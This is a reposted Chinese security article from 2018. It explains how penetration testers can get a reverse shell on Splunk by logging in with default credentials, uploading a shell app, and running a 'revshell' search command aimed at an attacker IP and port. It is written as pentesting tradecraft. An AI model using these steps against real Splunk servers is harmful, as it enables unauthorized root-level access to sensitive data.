专栏首页FreeBuf在Splunk上安装自定义应用反弹Shell的方法

在Splunk上安装自定义应用反弹Shell的方法

前言

每次测试时我都会碰到Splunk。Splunk是一个用于搜索,分析和可视化数据的软件平台。通常,Splunk中都会包含着各种数据,其中一些可能是较为敏感的数据。因此,对于渗透测试人员而言它的价值不言而喻。

想要获得对Splunk的访问权限,可以通过猜密码或重用之前获取到的密码尝试登录。曾经,我有过使用“admin:admin”或“admin:changeme”登录进入管理控制台的情况。

Splunk app

有一个技巧我相信很多人都不知道,就是使用Splunk app来执行python代码。TBG Security团队开发了一款可用于渗透测试的Splunk app。该应用早在2017年就已经推出。尽管如此,我觉得还是很少有人知道这个工具,我觉得它应该受到更多人的关注。

工具的使用非常简单。首先,你只需从Splunk Shells GitHub页面下载其最新版本。

登录Splunk管理控制台后,依次单击“App”栏和“Manage Apps”。

进入Apps面板后,单击“Install app from file”。

单击browse按钮并上传tar.gz文件。

应用成功上传后,必须重启Splunk。重启后登录Splunk,并返回到“Apps”界面。单击permissions,当你看到“Sharing”选项时,单击“All Apps”单选按钮。

安装app后,最后要做的就是获取shell。这里会有一些选项,我选择的是通过Metasploit创建的标准反向shell。

MSF handler(或netcat listener)启动并运行后,键入以下命令触发app:

| revshell SHELLTYPE ATTACKERIP ATTACKERPORT

这将立即执行app,并获取到一个反向shell。

以上测试是在Splunk 7.0上进行的,一切都非常的顺利!Splunk通常以root身份运行,这为攻击者提供了枚举主机其他信息的机会,而不仅仅是局限在数据库范围。

*参考来源:n00py,FB小编secist编译,转载请注明来自FreeBuf.COM

本文分享自微信公众号 - FreeBuf(freebuf)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-11-03

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • iOS“远程越狱”间谍软件Pegasus技术分析

    上周苹果紧急发布了iOS 9.3.5,修复了三个0day漏洞,这3个漏洞能让攻击者对全球范围内的iPhone进行监听。 ? 这三个漏洞被爆出的起因是因为以为阿联...

    FB客服
  • 美国漏洞众测平台HackerOne运营模式解读与分析

    3月,当美国国防部宣布与HackerOne合作邀请黑客参与“Hack the Pentagon”的漏洞奖励计划之后,让HackerOne再次成为业界焦点。对于混...

    FB客服
  • 看我利用传真功能漏洞渗透进入企业内网

    从远古时代的飞鸽传书到后来的邮政快递,写信人与收信人之间的物理消息传递方式逐渐在演变发展,之后,传真技术的出现从某种程度上说,帮助人们走出了信件传递的黑暗时代。

    FB客服
  • iOS开发之利用Block逆向传值

    在iOS开发之通过代理逆向传值一文中,分析了利用代理模式来逆向传值,其实还有一些其他的方式,如通知、Block等,相比较代理,我个人认为反而要简单些,但是需要处...

    YungFan
  • Gin框架 - 数据绑定和验证

    上篇文章分享了 Gin 框架使用 Logrus 进行日志记录,这篇文章分享 Gin 框架的数据绑定与验证。

    新亮
  • SpringBoot:优雅地处理全局异常

    其实Spring系列的项目全局异常处理方式早已存在,只不过我们一直忙于搬砖,很少停下脚步去审视这个日夜与我们相伴的朋友。为了贴合主题,本次主要针对SpringB...

    程序员小明
  • python接口自动化3-自动发帖(session)

    前言 上一篇模拟登录博客园,但这只是第一步,一般登录后,还会有其它的操作,如发帖,评论等,这时候如何保持会话呢? 一、session简介 1.查看帮助文档...

    上海-悠悠
  • UI图片纹理的压缩问题

    Unity对纹理的处理是智能的:不论你放入的是PNG,PSD还是TGA,它们都会被自动转换成Unity自己的Texture2D格式。在Texture2D的设置选...

    雷潮
  • Java 学习笔记(11)——异常处理

    比如说,你的代码少了一个分号,那么运行出来结果是提示是错误 java.lang.Error;如果你用System.out.println(11/0),那么你是因...

    Masimaro
  • 应该抛出什么异常?不应该抛出什么异常?(.NET/C#)

    2018-02-04 13:25

    walterlv

扫码关注云+社区

领取腾讯云代金券